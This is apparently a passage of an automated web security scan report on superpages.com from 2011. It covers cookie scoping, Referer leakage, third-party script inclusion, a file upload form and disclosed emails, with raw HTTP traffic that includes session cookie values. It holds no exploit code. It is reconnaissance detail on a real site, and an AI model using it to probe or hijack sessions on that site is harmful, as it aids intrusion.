HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:05:49 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:49 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cities HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 301 Moved Permanently Date: Thu, 03 Feb 2011 17:06:30 GMT Server: Unspecified Location: http://www.superpages.com/cities/ Content-Length: 241 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:30 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.superpages.c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cities/ HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:31 GMT Server: Unspecified Vary: Host Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:31 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Superpages.com: City ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* SiteCatalyst code version: H.22.1. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/social/sln.php HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 302 Found Date: Thu, 03 Feb 2011 17:05:59 GMT Server: Unspecified Vary: Host Location: Content-Length: 0 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:59 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
var IE = document.all?true:false if (!IE) document.captureEvents(Event.MOUSEMOVE) document.onmousemove = getMouseXY; var tempX = 0 var tempY = 0 function getMouseXY(e) { if (IE) { // grab the x-y po ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/promo.js HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B
/* CURRENT DEAL */ var pagesource = jQuery("body").attr("id"); var url=window.location.toString(); /*strip the 'http://'*/ /*use 'split' to break the url up by '/' into an array */ if((url=="http://ww ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /vorpal/jabberwocky.cgi HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:06:36 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:36 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yellowpages/C-Banks HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:05:59 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:05:59GMT Content-Length: 43816 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:59 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks in Yellow Pages by SuperPages"> <meta name="desc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/ Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:00:23 GMT Content-Length: 65780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]...
5. Cross-domain Referer leakagepreviousnext There are 3 instances of this issue:
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The response dynamically includes the following script from another domain:
http://w.sharethis.com/button/sharethis.js
Request
GET /bp/US/javascript:%20return%20validate() HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:05:37 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:37 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]... <div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://w.sharethis.com/button/sharethis.js
Request
GET /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg') HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:05:49 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:49 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]... <div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://w.sharethis.com/button/sharethis.js
Request
GET /vorpal/jabberwocky.cgi HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:06:36 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:36 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]... <div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script> ...[SNIP]...
The page contains a form which is used to submit a user-supplied file to the following URL:
http://ugc.superpages.com/ugcwiki/PhotosServlet
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.
Issue background
File upload functionality is commonly associated with a number of vulnerabilities, including:
File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service
You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.
Some factors to consider when evaluating the security impact of this functionality include:
Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.
Issue remediation
File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:
Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/ Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:00:23 GMT Content-Length: 65780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... </iframe> <input alt="Browse" size="40" type="file" id="filetfb" name="myFile" value="Browse" > <br /> ...[SNIP]...
8. Email addresses disclosedprevious There are 12 instances of this issue:
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET / HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:27 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:27 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email addresses were disclosed in the response:
dmcanotices@supermedia.com
xxx@proxymail.facebook.com
Request
GET /about/copyright.html HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:04 GMT Server: Unspecified Vary: Host Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:04 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-e ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]... <br /> Email: dmcanotices@supermedia.com</p> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /about/privacy.html HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:06:05 GMT Server: Unspecified Vary: Host Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:05 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /bp/ HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:05:55 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:55 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/ Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:00:23 GMT Content-Length: 65780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /bp/US/javascript:%20return%20validate() HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 17:05:37 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:37 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SuperPages.com: Not Found - Please Try Again</title> <meta http-equiv="Cont ...[SNIP]... <td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td> ...[SNIP]...
The following email address was disclosed in the response:
xxx@proxymail.facebook.com
Request
GET /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg') HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
